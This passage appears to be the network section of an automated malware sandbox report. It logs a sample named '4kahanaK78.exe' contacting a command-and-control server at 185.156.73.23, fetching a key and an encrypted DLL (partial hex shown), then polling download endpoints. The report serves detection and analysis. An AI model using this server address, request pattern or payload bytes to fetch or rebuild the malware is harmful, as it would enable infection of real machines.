                                  Dec 20, 2024 16:38:09.715847015 CET8049839185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:11.019649029 CET8049839185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:11.019736052 CET4983980192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:13.053987026 CET4983980192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:13.054300070 CET4984880192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:13.177840948 CET8049848185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:13.179630995 CET4984880192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:13.179928064 CET4984880192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:13.195518970 CET8049839185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:13.195643902 CET4983980192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:13.299437046 CET8049848185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:14.601825953 CET8049848185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:14.601999998 CET4984880192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:16.622499943 CET4984880192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:16.623091936 CET4985680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:16.850523949 CET8049848185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:16.850539923 CET8049856185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:16.850589037 CET4984880192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:16.850655079 CET4985680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:16.850991011 CET4985680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:16.970865011 CET8049856185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:18.620090008 CET8049856185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:18.620210886 CET4985680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:20.666404009 CET4985680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:20.666766882 CET4986580192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:20.788775921 CET8049865185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:20.788850069 CET4986580192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:20.789423943 CET4986580192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:20.789654016 CET8049856185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:20.789722919 CET4985680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:20.909574032 CET8049865185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:22.234945059 CET8049865185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:22.235810041 CET4986580192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:24.308217049 CET4986580192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:24.308732033 CET4987480192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:24.428292990 CET8049874185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:24.428333998 CET8049865185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:24.428441048 CET4986580192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:24.428441048 CET4987480192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:24.428765059 CET4987480192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:24.548418999 CET8049874185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:25.862947941 CET8049874185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:25.863049030 CET4987480192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:28.443792105 CET4987480192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:28.563782930 CET8049874185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:28.563874006 CET4987480192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:29.027817011 CET4988680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:29.147419930 CET8049886185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:29.147522926 CET4988680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:29.147886038 CET4988680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:29.268431902 CET8049886185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:31.585056067 CET4988680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:31.589955091 CET4989380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:31.709496975 CET8049893185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:31.709585905 CET4989380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:31.709904909 CET4989380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:31.724962950 CET4989380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:31.829421997 CET8049893185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:31.829499960 CET4989380192.168.2.5185.156.73.23

                                  HTTP Request Dependency Graph

                                  • 185.156.73.23

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549793185.156.73.23804128C:\Users\user\Desktop\4kahanaK78.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 20, 2024 16:37:50.105938911 CET414OUTGET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: 1
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 20, 2024 16:37:51.585705996 CET204INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:37:51 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0
                                  Dec 20, 2024 16:37:51.595069885 CET388OUTGET /dll/key HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: 1
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 20, 2024 16:37:52.120620012 CET224INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:37:51 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 21
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                  Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                  Dec 20, 2024 16:37:52.126172066 CET393OUTGET /dll/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: 1
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 20, 2024 16:37:52.747107029 CET1236INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:37:52 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                  Content-Length: 97296
                                  Keep-Alive: timeout=5, max=98
                                  Connection: Keep-Alive
                                  Content-Type: application/octet-stream
                                  Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                  Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                  Dec 20, 2024 16:37:52.747215986 CET1236INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                  Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
                                  Dec 20, 2024 16:37:52.747234106 CET1236INData Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                  Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                  Dec 20, 2024 16:37:52.747422934 CET1236INData Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4
                                  Data Ascii: BGpwCy6$h$x*Z|YQ|5#n&!w@Duhs:|BFGc3_^M*H_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
                                  Dec 20, 2024 16:37:52.747440100 CET1236INData Raw: 65 3b 47 31 40 6c 58 a4 f2 72 e0 62 45 fe 13 75 f3 bf 71 98 82 ed 0b 91 d9 fa 6f fb bb 0c b6 96 17 6c 50 87 9d 6a f0 e3 e5 e5 17 2f 04 e1 78 4b 7b ec a4 0a 66 3a c7 1b de e3 06 f4 33 94 a4 66 e3 66 11 87 2a 50 e7 5f f0 a7 8b 90 b0 e7 20 a1 56 ea
                                  Data Ascii: e;G1@lXrbEuqolPj/xK{f:3ff*P_ VufJJh2~Uz=;6DmjDX,t3{etiOaB?hcMT#iHyKg7`Cx6'JgYOL(>@2O0inol%t-9'
                                  Dec 20, 2024 16:37:52.747458935 CET1236INData Raw: 18 fc a2 90 2b 67 71 38 68 4e e5 23 79 cf 33 c9 7b 68 89 24 07 d9 65 9b c2 05 5b 73 79 a0 fa 5d 0b 18 e7 03 da 3c 02 9a eb 59 06 94 8c a5 f8 69 3f f6 01 62 ec cb f9 de 45 fa 09 83 a3 f7 21 af d3 6f d5 a4 26 c7 c1 ee 10 d1 cd 23 d9 b7 3d bf ce a7
                                  Data Ascii: +gq8hN#y3{h$e[sy]<Yi?bE!o&#=fmCALA-0BiwXV-+[X>Og{:i{It_v50#xa=cWBd/QFI6N' 3F$R/3Oqt]uqp3GU@(
                                  Dec 20, 2024 16:37:52.747478008 CET1236INData Raw: 86 d0 0e 0e f5 2b 0b f5 8d f7 79 40 71 81 e1 45 02 36 97 09 61 9b 5f dc b2 b1 d0 95 a0 5d 70 7b 40 b1 c5 76 fa 38 88 2f 7c 5a a9 00 9d 47 93 df 14 da 54 c6 55 b5 fc 8e fd 29 bf 7f d9 f7 52 82 c1 5f b3 a1 7d bb 48 e0 29 38 0d 63 13 83 b6 e2 b0 e0
                                  Data Ascii: +y@qE6a_]p{@v8/|ZGTU)R_}H)8c'ATd10?lg;&jg8KnWwD0a_r+42}20.u~Q$z2i@=sdkO8m(pC
                                  Dec 20, 2024 16:37:52.748111010 CET1236INData Raw: c3 9c 69 5d eb 54 db 81 bb 6b 66 5e ab f4 9b 3d ee ff 1b d1 4b 71 18 e1 6e 42 a8 ab 9c 98 14 85 99 99 0e a1 66 a6 1c 27 bd 4a b3 a3 d4 cf 6b 2b dc 89 26 b7 59 fe 26 0d 72 54 62 f2 c9 80 5f 45 0d 82 64 28 85 e9 69 0d 69 77 dd df e1 4d 16 de d3 9a
                                  Data Ascii: i]Tkf^=KqnBf'Jk+&Y&rTb_Ed(iiwM3mo.m4moNm09k-:zTzxGc|Ub<|Y>. Tu#f-UM!+g@!4<fG7IkEl
                                  Dec 20, 2024 16:37:52.755369902 CET1236INData Raw: bf 33 41 12 5b 52 91 a7 94 e0 e5 21 5d 8d 93 1b 30 af be 5e 8f 7b 94 24 bc 87 3d 50 74 38 00 cd a5 7b 35 ab 90 44 11 e5 40 7a 29 92 1d b3 4a 52 10 d4 8d 43 b3 ff 3c 6b 20 35 4a e1 86 bc f7 99 68 67 d7 c4 fb c8 a1 b9 38 b1 27 61 b3 3c e2 f9 cc 06
                                  Data Ascii: 3A[R!]0^{$=Pt8{5D@z)JRC<k 5Jhg8'a<dIC2ui$wtHLnc}QJ4;[r|^%<t5S[AIa+48*xs30SxNZCPH3U"~6GxeZE3 SZF&=Qt`d^u
                                  Dec 20, 2024 16:37:52.755616903 CET1236INData Raw: c8 a2 6d 52 66 a8 66 51 d1 c3 c9 87 9b d8 0b 44 57 eb 08 d8 cd bc b7 be b7 f1 4b 89 c0 b1 44 55 84 bc 8d 8d 36 2c c3 07 89 a5 46 50 8a ac fe f3 ba 23 4d 4f e4 0f 27 9f e1 11 07 f4 e0 e7 17 61 0e 07 54 3f cc 3f ae 3a 77 4d e4 44 61 15 b1 b3 97 25
                                  Data Ascii: mRffQDWKDU6,FP#MO'aT??:wMDa%k;3?Bc| yp`yzlSniVN(Bv}:XsOf.~zToX8n K$:D6Z%NNng=t+L~6DtFX[a/[
                                  Dec 20, 2024 16:37:52.763876915 CET1236INData Raw: d3 59 d3 30 18 53 4e 25 dc 9e 95 b9 da a6 3e 71 c0 45 79 32 7a f2 9f 43 ae e4 0b 25 8a bf 44 da e3 4d 77 72 50 8f 9d 18 42 0f 58 f1 b2 46 1d e6 97 70 c7 39 3b b2 a3 64 90 74 04 57 77 50 fc 49 1c ac 46 a7 37 5f 66 b7 fd b1 37 84 39 3f 7b d6 9b 57
                                  Data Ascii: Y0SN%>qEy2zC%DMwrPBXFp9;dtWwPIF7_f79?{WdA_9qH1^S-;0_lc%.I5[j-(HK&c?EUXTVnMXyU47=`L4^9\7am:i`v{]
                                  Dec 20, 2024 16:37:53.258409977 CET395OUTGET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 20, 2024 16:37:53.790546894 CET203INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:37:53 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=97
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0
                                  Dec 20, 2024 16:37:55.819197893 CET395OUTGET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 20, 2024 16:37:56.648529053 CET203INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:37:56 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=96
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0
                                  Dec 20, 2024 16:37:58.662985086 CET395OUTGET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 20, 2024 16:37:59.193500042 CET203INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:37:58 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=95
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0
                                  Dec 20, 2024 16:38:01.209920883 CET395OUTGET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 20, 2024 16:38:02.036369085 CET203INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:01 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=94
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0
                                  Dec 20, 2024 16:38:04.053390026 CET395OUTGET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 20, 2024 16:38:04.619503975 CET203INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:04 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=93
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0
                                  Dec 20, 2024 16:38:06.631625891 CET395OUTGET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 20, 2024 16:38:07.462344885 CET203INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:07 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=92
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.549839185.156.73.23804128C:\Users\user\Desktop\4kahanaK78.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 20, 2024 16:38:09.596317053 CET395OUTGET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 20, 2024 16:38:11.019649029 CET204INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:10 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.549848185.156.73.23804128C:\Users\user\Desktop\4kahanaK78.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 20, 2024 16:38:13.179928064 CET395OUTGET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 20, 2024 16:38:14.601825953 CET204INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:14 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.549856185.156.73.23804128C:\Users\user\Desktop\4kahanaK78.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 20, 2024 16:38:16.850991011 CET395OUTGET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 20, 2024 16:38:18.620090008 CET204INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:18 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.549865185.156.73.23804128C:\Users\user\Desktop\4kahanaK78.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 20, 2024 16:38:20.789423943 CET395OUTGET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 20, 2024 16:38:22.234945059 CET204INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:21 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.549874185.156.73.23804128C:\Users\user\Desktop\4kahanaK78.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 20, 2024 16:38:24.428765059 CET395OUTGET /files/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: C
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Dec 20, 2024 16:38:25.862947941 CET204INHTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:38:25 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.549886185.156.73.23804128C:\Users\user\Desktop\4kahanaK78.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 20, 2024 16:38:29.147886038 CET394OUTGET /soft/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: d
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.549893185.156.73.23804128C:\Users\user\Desktop\4kahanaK78.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 20, 2024 16:38:31.709904909 CET394OUTGET /soft/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: s
                                  Host: 185.156.73.23
